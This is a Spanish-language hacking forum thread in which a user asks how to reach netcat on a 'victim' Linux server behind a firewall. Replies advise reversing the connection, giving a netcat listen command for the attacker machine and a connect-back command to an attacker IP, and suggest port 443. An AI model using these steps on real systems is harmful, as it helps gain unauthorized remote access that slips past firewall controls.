netcat reverse shell: netcat a través de una firewall?

Iniciado por ferdna, Agosto 02, 2019, 09:13:53 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Agosto 02, 2019, 09:13:53 PM Ultima modificación: Agosto 02, 2019, 09:18:58 PM por AXCESS
como podria conectarme a netcat a traves de una firewall? ya tengo netcat corriendo en el servidor linux y hay algunos puertos abiertos (como el 80, etc) en la firewall.
Agosto 03, 2019, 12:26:52 AM #1
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hola, no te recomiendo que uses a netcat como un "Bind Shell" a través de una máquina, son relativamente más fáciles de detectar.

Puedes usar lo siguiente:

*Netcat escucha* - Tu máquina

Código: bash

nc -l -vv -n -p <Puerto>


*Conectamos* - Máquina con el firewall

Código: bash

nc -vv <Dirección IP> <Puerto>


Nota: Claro, aquí sólo te muestro como hacer una simple conexión entre Sockets; Esto te permitirá enviar y recibir mensajes.

Nota-2: A pesar de que puedas evadir un firewall mal configurado, uno que lo esté no te permitirá hacer esto sin compasión.

- DtxdF
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF
Agosto 03, 2019, 12:31:48 AM #2
muchisimas gracias por responder DtxdF.

que otra solucion tengo? acabo de probar esos comandos y no pasa el firewall :(
Agosto 03, 2019, 01:19:48 AM #3
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Estas colocando a netcat a la escucha en tu máquina?, Me refiero a la atacante.

Si el firewall no permite el tráfico saliente por parte de la máquina que lo tiene, es muy difícil que tengas acceso; tendrás que ver puertos permite y además si admite a direcciones específicas.

Me indicaste que el firewall tiene el puerto 80 abierto. ¿te refieres a que un servicio está escuchando o que el firewall tiene permitido ese puerto?; Si el firewall tiene permitido la escucha de un servicio en ese puerto corres con suerte, pero si un servicio ya está escuchando es muy difícil o el sistema ni siquiera te dejará la posibilidad de que escuches una conexión.
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF
Agosto 03, 2019, 01:36:39 AM #4
si correcto. estoy colocando netcat a la escucha en la maquina victima.

diagrama de flujo mega elaborado:     victima | firewall(80) | atacante(yo)

la victima corre apache en el puerto 80 y otros servicios. y si esos puertos van dirigidos a la victima.
Agosto 03, 2019, 02:47:08 AM #5
-Port 443
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Agosto 03, 2019, 04:03:17 AM #6
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
si correcto. estoy colocando netcat a la escucha en la maquina victima.

diagrama de flujo mega elaborado:     victima | firewall(80) | atacante(yo)

la victima corre apache en el puerto 80 y otros servicios. y si esos puertos van dirigidos a la victima.
Pues ponlo al revés como te están diciendo. La escucha en tu máquina

Lo siento, no contesto dudas por MP, si tienes dudas las planteas en el foro.
Agosto 03, 2019, 06:40:39 AM #7
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Citar
si correcto. estoy colocando netcat a la escucha en la maquina victima.

diagrama de flujo mega elaborado:     victima | firewall(80) | atacante(yo)

la victima corre apache en el puerto 80 y otros servicios. y si esos puertos van dirigidos a la victima.

:'(

@aminanegra

Citar
Pues ponlo al revés como te están diciendo. La escucha en tu máquina

Exacto.
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF
Imprimir
Ir Arriba Páginas1
Acciones del Usuario